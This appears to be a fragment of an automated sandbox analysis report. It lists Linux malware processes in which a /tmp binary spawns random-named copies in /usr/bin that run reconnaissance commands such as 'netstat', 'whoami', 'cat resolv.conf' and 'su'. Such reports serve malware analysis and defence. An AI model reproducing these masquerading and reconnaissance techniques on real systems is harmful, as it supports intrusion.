MD5 hash:	c79907a39ea5c1fd2e6c1b15c7fc0ae8

Chronological Activities

Analysis Process: vrbpjcuukk PID: 12012, Parent PID: 11989

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/usr/bin/vrbpjcuukk
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	c79907a39ea5c1fd2e6c1b15c7fc0ae8

Chronological Activities

Analysis Process: dkuidbsedp PID: 11990, Parent PID: 9446

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11992, Parent PID: 11990

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: vrbpjcuukk PID: 11992, Parent PID: 3310

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/usr/bin/vrbpjcuukk
Arguments:	/usr/bin/vrbpjcuukk bash 9446
File size:	625933 bytes
MD5 hash:	c79907a39ea5c1fd2e6c1b15c7fc0ae8

Chronological Activities

Analysis Process: vrbpjcuukk PID: 11997, Parent PID: 11992

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/usr/bin/vrbpjcuukk
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	c79907a39ea5c1fd2e6c1b15c7fc0ae8

Chronological Activities

Analysis Process: dkuidbsedp PID: 11993, Parent PID: 9446

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11996, Parent PID: 11993

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: vrbpjcuukk PID: 11996, Parent PID: 3310

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/usr/bin/vrbpjcuukk
Arguments:	/usr/bin/vrbpjcuukk "netstat -an" 9446
File size:	625933 bytes
MD5 hash:	c79907a39ea5c1fd2e6c1b15c7fc0ae8

Chronological Activities

Analysis Process: vrbpjcuukk PID: 12001, Parent PID: 11996

General

Start time:	09:52:10
Start date:	27/07/2022
Path:	/usr/bin/vrbpjcuukk
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	c79907a39ea5c1fd2e6c1b15c7fc0ae8

Chronological Activities

Analysis Process: dkuidbsedp PID: 12039, Parent PID: 9446

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 12040, Parent PID: 12039

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: potliirubi PID: 12040, Parent PID: 3310

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/usr/bin/potliirubi
Arguments:	/usr/bin/potliirubi "cat resolv.conf" 9446
File size:	625933 bytes
MD5 hash:	1ff01d36ef688ea454fac5af6af15593

Chronological Activities

Analysis Process: potliirubi PID: 12053, Parent PID: 12040

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/usr/bin/potliirubi
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	1ff01d36ef688ea454fac5af6af15593

Chronological Activities

Analysis Process: dkuidbsedp PID: 12041, Parent PID: 9446

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 12042, Parent PID: 12041

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: potliirubi PID: 12042, Parent PID: 3310

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/usr/bin/potliirubi
Arguments:	/usr/bin/potliirubi "grep \"A\"" 9446
File size:	625933 bytes
MD5 hash:	1ff01d36ef688ea454fac5af6af15593

Chronological Activities

Analysis Process: potliirubi PID: 12061, Parent PID: 12042

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/usr/bin/potliirubi
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	1ff01d36ef688ea454fac5af6af15593

Chronological Activities

Analysis Process: dkuidbsedp PID: 12043, Parent PID: 9446

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 12044, Parent PID: 12043

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: potliirubi PID: 12044, Parent PID: 3310

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/usr/bin/potliirubi
Arguments:	/usr/bin/potliirubi su 9446
File size:	625933 bytes
MD5 hash:	1ff01d36ef688ea454fac5af6af15593

Chronological Activities

Analysis Process: potliirubi PID: 12067, Parent PID: 12044

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/usr/bin/potliirubi
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	1ff01d36ef688ea454fac5af6af15593

Chronological Activities

Analysis Process: dkuidbsedp PID: 12045, Parent PID: 9446

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 12047, Parent PID: 12045

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: potliirubi PID: 12047, Parent PID: 3310

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/usr/bin/potliirubi
Arguments:	/usr/bin/potliirubi "netstat -antop" 9446
File size:	625933 bytes
MD5 hash:	1ff01d36ef688ea454fac5af6af15593

Chronological Activities

Analysis Process: potliirubi PID: 12052, Parent PID: 12047

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/usr/bin/potliirubi
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	1ff01d36ef688ea454fac5af6af15593

Chronological Activities

Analysis Process: dkuidbsedp PID: 12048, Parent PID: 9446

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 12051, Parent PID: 12048

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: potliirubi PID: 12051, Parent PID: 3310

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/usr/bin/potliirubi
Arguments:	/usr/bin/potliirubi gnome-terminal 9446
File size:	625933 bytes
MD5 hash:	1ff01d36ef688ea454fac5af6af15593

Chronological Activities

Analysis Process: potliirubi PID: 12056, Parent PID: 12051

General

Start time:	09:52:15
Start date:	27/07/2022
Path:	/usr/bin/potliirubi
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	1ff01d36ef688ea454fac5af6af15593

Chronological Activities

Analysis Process: dkuidbsedp PID: 12094, Parent PID: 9446

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 12095, Parent PID: 12094

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qvavyybczk PID: 12095, Parent PID: 3310

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/usr/bin/qvavyybczk
Arguments:	/usr/bin/qvavyybczk whoami 9446
File size:	625922 bytes
MD5 hash:	813b0ad93e1e530f46c964216e20fa74

Chronological Activities

Analysis Process: qvavyybczk PID: 12108, Parent PID: 12095

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/usr/bin/qvavyybczk
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	813b0ad93e1e530f46c964216e20fa74

Chronological Activities

Analysis Process: dkuidbsedp PID: 12096, Parent PID: 9446

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 12097, Parent PID: 12096

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qvavyybczk PID: 12097, Parent PID: 3310

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/usr/bin/qvavyybczk
Arguments:	/usr/bin/qvavyybczk uptime 9446
File size:	625922 bytes
MD5 hash:	813b0ad93e1e530f46c964216e20fa74

Chronological Activities

Analysis Process: qvavyybczk PID: 12113, Parent PID: 12097

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/usr/bin/qvavyybczk
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	813b0ad93e1e530f46c964216e20fa74

Chronological Activities

Analysis Process: dkuidbsedp PID: 12098, Parent PID: 9446

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 12099, Parent PID: 12098

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qvavyybczk PID: 12099, Parent PID: 3310

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/usr/bin/qvavyybczk
Arguments:	/usr/bin/qvavyybczk uptime 9446
File size:	625922 bytes
MD5 hash:	813b0ad93e1e530f46c964216e20fa74

Chronological Activities

Analysis Process: qvavyybczk PID: 12112, Parent PID: 12099

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/usr/bin/qvavyybczk
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	813b0ad93e1e530f46c964216e20fa74

Chronological Activities

Analysis Process: dkuidbsedp PID: 12100, Parent PID: 9446

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 12102, Parent PID: 12100

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qvavyybczk PID: 12102, Parent PID: 3310

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/usr/bin/qvavyybczk
Arguments:	/usr/bin/qvavyybczk "netstat -an" 9446
File size:	625922 bytes
MD5 hash:	813b0ad93e1e530f46c964216e20fa74

Chronological Activities

Analysis Process: qvavyybczk PID: 12105, Parent PID: 12102

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/usr/bin/qvavyybczk
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	813b0ad93e1e530f46c964216e20fa74

Chronological Activities

Analysis Process: dkuidbsedp PID: 12103, Parent PID: 9446

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 12104, Parent PID: 12103

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qvavyybczk PID: 12104, Parent PID: 3310

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/usr/bin/qvavyybczk
Arguments:	/usr/bin/qvavyybczk who 9446
File size:	625922 bytes
MD5 hash:	813b0ad93e1e530f46c964216e20fa74

Chronological Activities

Analysis Process: qvavyybczk PID: 12122, Parent PID: 12104

General

Start time:	09:52:20
Start date:	27/07/2022
Path:	/usr/bin/qvavyybczk
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	813b0ad93e1e530f46c964216e20fa74

Chronological Activities